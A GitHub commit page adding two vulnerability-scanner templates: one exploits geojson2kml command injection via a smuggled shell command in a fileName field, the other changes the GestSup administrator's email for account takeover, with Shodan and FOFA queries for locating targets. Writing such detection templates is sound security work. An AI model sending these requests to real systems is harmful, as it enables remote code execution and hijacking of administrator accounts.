-
Notifications
You must be signed in to change notification settings - Fork 2.6k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #10489 from eeche/eeche/CVE-2020-28429
Added CVE-2020-28429 by eeche
- Loading branch information
Showing
2 changed files
with
139 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,79 @@ | ||
| id: CVE-2020-28429 | ||
|
|
||
| info: | ||
| name: geojson2kml - Command Injection | ||
| author: eeche,chae1xx1os,persona-twotwo,soonghee2 | ||
| severity: critical | ||
| description: | | ||
| Detects command injection vulnerability by checking if `hacked.txt` is created and contains the expected content. | ||
| impact: | | ||
| Successful exploitation of this vulnerability could result in unauthorized access, remote code execution, privilege escalation | ||
| remediation: | | ||
| Do not use geojson2kml. There is no fixed version for geojson2kml. | ||
| reference: | ||
| - https://snyk.io/vuln/SNYK-JS-GEOJSON2KML-1050412 | ||
| - https://github.com/advisories/GHSA-w83x-fp72-p9qc | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2020-28429 | ||
| classification: | ||
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
| cvss-score: 9.8 | ||
| cve-id: CVE-2020-28429 | ||
| cwe-id: CWE-78 | ||
| epss-score: 0.01897 | ||
| epss-percentile: 0.8876 | ||
| cpe: cpe:2.3:a:geojson2kml_project:geojson2kml:*:*:*:*:*:node.js:*:* | ||
| metadata: | ||
| max-request: 1 | ||
| vendor: geojson2kml_project | ||
| product: geojson2kml | ||
| framework: node.js | ||
| tags: cve,cve2020,rce,geojson2kml,file-upload,intrusive | ||
|
|
||
| variables: | ||
| filename: '{{rand_base(6)}}' | ||
|
|
||
| http: | ||
| - raw: | ||
| - | | ||
| POST /convert HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Content-Type: application/json | ||
| { | ||
| "fileName": "& echo \"{{randstr}}\" > {{filename}}.txt && ls", | ||
| "geoJsonData": { | ||
| "type": "FeatureCollection", | ||
| "features": [ | ||
| { | ||
| "type": "Feature", | ||
| "geometry": { | ||
| "type": "Point", | ||
| "coordinates": [102.0, 0.5] | ||
| }, | ||
| "properties": { | ||
| "prop0": "value0" | ||
| } | ||
| } | ||
| ] | ||
| } | ||
| } | ||
| - | | ||
| GET /file/{{filename}}.txt HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: body_2 | ||
| words: | ||
| - "{{randstr}}" | ||
|
|
||
| - type: word | ||
| part: header_2 | ||
| words: | ||
| - "text/html" | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,60 @@ | ||
| id: CVE-2024-23163 | ||
|
|
||
| info: | ||
| name: GestSup - Account Takeover | ||
| author: eeche,chae1xx1os,persona-twotwo,soonghee2,gy741 | ||
| severity: critical | ||
| impact: | | ||
| An attacker could bypass the authentication process and access the application as an administrator user by modifying the usermail field to a controlled email address and requesting a password reset. | ||
| remediation: Apply necessary security patches or updates provided by the vendor to secure the ticket_user_db.php endpoint and ensure proper authentication checks are in place. | ||
| reference: | ||
| - https://www.synacktiv.com/advisories/multiple-vulnerabilities-on-gestsup-3244 | ||
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23163 | ||
| - https://doc.gestsup.fr/install/ | ||
| classification: | ||
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
| cvss-score: 9.8 | ||
| cve-id: CVE-2024-23163 | ||
| cwe-id: CWE-287 | ||
| metadata: | ||
| verified: true | ||
| max-request: 1 | ||
| vendor: gestsup | ||
| fofa-query: title="GestSup" | ||
| shodan-query: http.favicon.hash:-283003760 | ||
| tags: cve,cve2024,account-takeover,gestsup | ||
|
|
||
| variables: | ||
| email: "{{randstr}}@{{rand_base(5)}}.com" | ||
| firstname: "{{rand_base(5)}}" | ||
| lastname: "{{rand_base(5)}}" | ||
|
|
||
| http: | ||
| - raw: | ||
| - | | ||
| POST /ajax/ticket_user_db.php HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| X-Requested-With: xmlhttprequest | ||
| Content-Type: application/x-www-form-urlencoded | ||
| modifyuser=1&lastname={{lastname}}&firstname={{firstname}}&phone=&mobile=&mail={{email}}&company=111&id=1 | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: body | ||
| words: | ||
| - '{"status":"success' | ||
| - 'firstname":"{{firstname}}","lastname":"{{lastname}}' | ||
| condition: and | ||
|
|
||
| - type: word | ||
| part: header | ||
| words: | ||
| - 'text/html' | ||
|
|
||
| extractors: | ||
| - type: dsl | ||
| dsl: | ||
| - '"Firstname: "+ firstname' | ||
| - '"Lastname: "+ lastname' |